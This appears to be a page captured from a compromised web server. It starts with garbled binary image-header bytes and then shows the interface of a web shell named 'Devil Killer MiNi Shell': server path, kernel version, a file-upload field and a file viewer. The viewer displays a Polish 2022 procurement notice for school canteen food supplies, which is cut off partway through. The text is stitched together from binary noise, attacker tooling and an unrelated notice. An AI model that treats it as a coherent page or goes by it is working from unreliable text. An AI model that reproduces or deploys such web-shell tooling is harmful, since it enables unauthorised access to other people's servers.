JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220713/0025161601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Sportowych w Siemianowicach Śląskich w roku szkolnym 2022/23 – od września do grudnia 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Sportowych w Siemianowicach Śląskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 277881075</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mikołaja 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemianowice Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-106</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zss-siemianowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zss-siemianowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Sportowych w Siemianowicach Śląskich w roku szkolnym 2022/23 – od września do grudnia 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e9a92f54-014a-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00251616</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00240715/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Sportowych w Siemianowicach Śląskich w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,<br/>https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. <br/>2.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu. <br/>3.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. <br/>4.	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Prawo zamówień publicznych oraz jeżeli dotyczy: podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, przedmiotowe środki dowodowe oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>5.	Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 4, przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej wskazanych przez Zamawiającego w Specyfikacji warunków zamówienia.<br/>6.	W przypadku, gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarte w rozdziale 33 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSSPO.392.2.ZP1/07/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Część nr 1: Przyprawy zapach świeży po otwarciu produktów, bez oznak spleśnienia, grudek. Produkty gotowane sypkie, bez sklejania się twarde sprężyste. Produkty z puszek bez pleśni , bez mętnej konsystencji i innych objawów zepsucia. Makarony sporządzone z najwyższej jakości mąki, zawiera pszenicę durum. Po ugotowaniu makaron nie może sklejać się, zachowuje sprężystość oraz naturalny zapach i kolor.<br/>Ananas w syropie w plastrach 560 g<br/>Bazylia suszona 500g<br/>Bułka tarta 1kg<br/>Cukier biały 1kg<br/>Czosnek granulowany 1 kg<br/>Drożdże piekarskie 100g<br/>Dżem gładki 235g ŁOWICZ lub równoważny (100 g owoców truskawek i czerwonych porzeczek użyto do wyprodukowania 100 g produktu, w tym 75 g truskawek i 25 g czerwonych porzeczek, zagęszczony sok jabłkowy, substancja żelująca – pektyny)Dżem gładki 235g ŁOWICZ lub równoważny (100 g owoców truskawek i czerwonych porzeczek użyto do wyprodukowania 100 g produktu, w tym 75 g truskawek i 25 g czerwonych porzeczek, zagęszczony sok jabłkowy, substancja żelująca – pektyny)Dżem gładki 235g ŁOWICZ lub równoważny (100 g owoców truskawek i czerwonych porzeczek użyto do wyprodukowania 100 g produktu, w tym 75 g truskawek i 25 g czerwonych porzeczek, zagęszczony sok jabłkowy, substancja żelująca – pektyny)Dżem gładki 235g ŁOWICZ lub równoważny (100 g owoców truskawek i czerwonych porzeczek użyto do wyprodukowania 100 g produktu, w tym 75 g truskawek i 25 g czerwonych porzeczek, zagęszczony sok jabłkowy, substancja żelująca – pektyny)Dżem gładki 235g ŁOWICZ lub równoważny (100 g owoców truskawek i czerwonych porzeczek użyto do wyprodukowania 100 g produktu, w tym 75 g truskawek i 25 g czerwonych porzeczek, zagęszczony sok jabłkowy, substancja żelująca – pektyny)<br/>Fasola „jaś” 1kg<br/>Gałka muszkatułowa 0,5kg<br/>Groch łuskany 1kg<br/>Groszek konserwowy KWIDZYN (Groszek, woda, cukier, sól) puszka 400g lub równoważnyGroszek konserwowy KWIDZYN (Groszek, woda, cukier, sól) puszka 400g lub równoważnyGroszek konserwowy KWIDZYN (Groszek, woda, cukier, sól) puszka 400g lub równoważnyGroszek konserwowy KWIDZYN (Groszek, woda, cukier, sól) puszka 400g lub równoważny Groszek konserwowy KWIDZYN (Groszek, woda, cukier, sól) puszka 400g lub równoważny<br/>Herbata czarna ekspresowa 200szt SAGA lub równoważna<br/>Chrzan tarty 1kg<br/>Kasza bulgur 1kg<br/>Kasza kus kus 1kg<br/>Kasza jęczmienna 1kg <br/>Kasza manna 1kg<br/>Koncentrat barszczu 300ml (zagęszczony sok z buraków 59,3%) KRAKUS lub równoważny<br/>Koncentrat pomidorowy 30% PUDLISZKI lub równoważny ( nie zawierający więcej niż 10g cukru na 100g produktu) 950g<br/>Koper liść suszony 1kg<br/>Kukurydza konserwowa KWIDZYN (kukurydza-ziarno, woda, cukier sól) puszka 400g lub równoważna Kukurydza konserwowa KWIDZYN (kukurydza-ziarno, woda, cukier sól) puszka 400g lub równoważna Kukurydza konserwowa KWIDZYN (kukurydza-ziarno, woda, cukier sól) puszka 400g lub równoważna Kukurydza konserwowa KWIDZYN (kukurydza-ziarno, woda, cukier sól) puszka 400g lub równoważna <br/>Liść laurowy 100g <br/>Lubczyk suszony 500g<br/>Majeranek otarty 1kg<br/>Majonez WINIARY700ml( olej roślinny, żółtko jaja6,0%, ocet, musztarda, (woda, gorczyca, ocet, sól, cukier, przyprawy, aromat)kwas cytrynowy) lub równoważnyMajonez WINIARY700ml( olej roślinny, żółtko jaja6,0%, ocet, musztarda, (woda, gorczyca, ocet, sól, cukier, przyprawy, aromat)kwas cytrynowy) lub równoważnyMajonez WINIARY700ml( olej roślinny, żółtko jaja6,0%, ocet, musztarda, (woda, gorczyca, ocet, sól, cukier, przyprawy, aromat)kwas cytrynowy) lub równoważnyMajonez WINIARY700ml( olej roślinny, żółtko jaja6,0%, ocet, musztarda, (woda, gorczyca, ocet, sól, cukier, przyprawy, aromat)kwas cytrynowy) lub równoważny<br/>Makaron łazanki (mąka z pszenicy durum) 500g<br/>Makaron muszelki małe (mąka z pszenicy durum) 500g<br/>Makaron nitki (3 jajeczny) 250g<br/>Makaron rurki (mąka z pszenicy durum) 1kg<br/>Makaron świderki (mąka z pszenicy durum) 1kg<br/>Mąka na żurek śląski żytnia razowa 1kg<br/>Curry 1kg<br/>Mąka tortowa typ 550 <br/>Mąka ziemniaczana 1kg<br/>Miód pszczeli naturalny 1kg<br/>Musztarda sarepska <br/>Natka pietruszki (susz) 500g<br/>Ocet winny <br/>Oregano suszone 300g<br/>Papryka słodka mielona 1kg<br/>Papryka ostra mielona 0,5kg<br/>Pędy bambusa marynowane 425g<br/>Pieprz cytrynowy mielony 500g<br/>Pieprz czarny mielony 1kg<br/>Przyprawa warzywna bez dodatku soli i glutaminianu sodu 1kg (pasternak grys, marchew grys, seler grys(alergen), pietruszka zielona, por płatek, lubczyk, kurkuma, czosnek granulowany, curry, cebula grys, pieprz czarny mielonyPrzyprawa warzywna bez dodatku soli i glutaminianu sodu 1kg (pasternak grys, marchew grys, seler grys(alergen), pietruszka zielona, por płatek, lubczyk, kurkuma, czosnek granulowany, curry, cebula grys, pieprz czarny mielonyPrzyprawa warzywna bez dodatku soli i glutaminianu sodu 1kg (pasternak grys, marchew grys, seler grys(alergen), pietruszka zielona, por płatek, lubczyk, kurkuma, czosnek granulowany, curry, cebula grys, pieprz czarny mielony<br/>Pulpa pomidorowa 10-12% PUDLISZKI 2,5kg (pomidory 100%) lub równoważna<br/>Ryż biały 1 kg<br/>Ryż paraboliczny 5kg<br/>Słonecznik pestki 1kg<br/>Sok 100% jabłko 200mlSok 100% jabłko 200ml<br/>Sos boloński 520g Pudliszki lub równoważny <br/>Sos słodko – kwaśny 520g Pudliszki lub równoważnySos słodko – kwaśny 520g Pudliszki lub równoważny<br/>Sól morska drobnoziarnista jodowana 1kg<br/>Woda mineralna 1,5l średnio zmineralizowana<br/>Woda mineralna 1,5l gazowana<br/>Woda mineralna n/gaz 5l<br/>Zacierka 250g<br/>Zakwas na barszcz biały 480ml<br/>Zioła prowansalskie 0,5kg<br/>Ziele angielskie 1kg<br/><br/>- ilości podane w załączniku do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający będzie zamawiał artykuły w miarę potrzeb, a gwarantowana ilość artykułów to 60% artykułów wymienionych w załączniku nr 1 do SWZ - formularzu asortymentowo - cenowym. Pozostałą część zamówienia Zamawiający zrealizuje zgodnie z zapotrzebowaniem. Zmniejszenie ilości zamawianych towarów (do 40% w stosunku do ilości podanych w opisie przedmiotu zamówienia) może mieć miejsce w przypadku zamknięcia kuchni z powodu awarii lub mniejszej ilości uczniów w szkole np. z powodu choroby, wycieczek lub zamknięcia szkoły z przyczyn nieprzewidzianych (np. siły wyższej, w tym pandemii). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">miejsce dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Część nr 2: mięso, wędliny, drób - barwa mięsa świeżego powinna być bladoróżowa do czerwonej. Produkty soczyste. Barwa, zapach, konsystencja, powierzchnia i przekrój mają świadczyć o świeżości produktu. Wędliny - konsystencja ścisła, barwa na przekroju jasno różowa, smak i zapach charakterystyczny dla mięsa peklowanego, parzonego i użytych przypraw, dopuszczalne pojedyncze skupiska galarety.<br/>Boczek wędzony klasa I<br/>Łopatka b/k klasa I<br/>Schab wprz b/k klasa I<br/>Żeberka wprz. Paski klasa I<br/>Filet z kurczaka klasa I<br/>Filet z indyka klasa I<br/>Gulaszowe z indyka<br/>Podudzia z kurczaka klasa I<br/>Udko z kurczaka klasa I<br/>Skrzydło z indyka klasa I<br/>Szponder wołowy klasa I<br/> Pieczeń roladowa wołowa klasa I<br/>Szynka wieprzowa bez kości - kulka<br/>Kiełbasa podwawelska (powyżej 70% mięsa w 100g , nie więcej niż 10g tłuszczu w 100g produktu gotowego)<br/>- ilości podane w załączniku do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający będzie zamawiał artykuły w miarę potrzeb, a gwarantowana ilość artykułów to 60% artykułów wymienionych w załączniku nr 1 do SWZ - formularzu asortymentowo - cenowym. Pozostałą część zamówienia Zamawiający zrealizuje zgodnie z zapotrzebowaniem. Zmniejszenie ilości zamawianych towarów (do 40% w stosunku do ilości podanych w opisie przedmiotu zamówienia) może mieć miejsce w przypadku zamknięcia kuchni z powodu awarii lub mniejszej ilości uczniów w szkole np. z powodu choroby, wycieczek lub zamknięcia szkoły z przyczyn nieprzewidzianych (np. siły wyższej, w tym pandemii). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">miejsce dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Część nr 3: produkty mleczarskie i tłuszcze - świeże, dobry smak po otwarciu produktów, niezbrylone sery naturalne, gęste jogurty; bez objawów zepsucia.<br/>Jajka kl.L<br/>Kefir 250g KRASNYSTAW lub równorzędny<br/>Masło 200g 83% tł <br/>Mleko 3,2% UHT<br/>Śmietana 12% 0,5l <br/>Ser typu gouda pełnotłusty 45% tł. lub równorzędny<br/>Twaróg półtłusty <br/>Oliwa z oliwek extra virgin<br/>Olej rzepakowy 5l (niearomatyzowany o zawartości kwasów jednonienasyconych powyżej 50% i zawartości kwasów wielonienasyconych poniżej 40%)<br/>Jogurt naturalny typ grecki 400g (zawierający nie więcej niż 10g cukrów na 100g/ml produktu, nie więcej niż 10g tłuszczów na 100g produktu)<br/>Serek topiony złoty ementaler lub równorzędny 100g<br/>Ser mozzarella 1kg<br/>Śmietana 12 % gęsta do zup, sosów i sałatek 400g<br/>- ilości podane w załączniku do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający będzie zamawiał artykuły w miarę potrzeb, a gwarantowana ilość artykułów to 60% artykułów wymienionych w załączniku nr 1 do SWZ - formularzu asortymentowo - cenowym. Pozostałą część zamówienia Zamawiający zrealizuje zgodnie z zapotrzebowaniem. Zmniejszenie ilości zamawianych towarów (do 40% w stosunku do ilości podanych w opisie przedmiotu zamówienia) może mieć miejsce w przypadku zamknięcia kuchni z powodu awarii lub mniejszej ilości uczniów w szkole np. z powodu choroby, wycieczek lub zamknięcia szkoły z przyczyn nieprzewidzianych (np. siły wyższej, w tym pandemii). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny 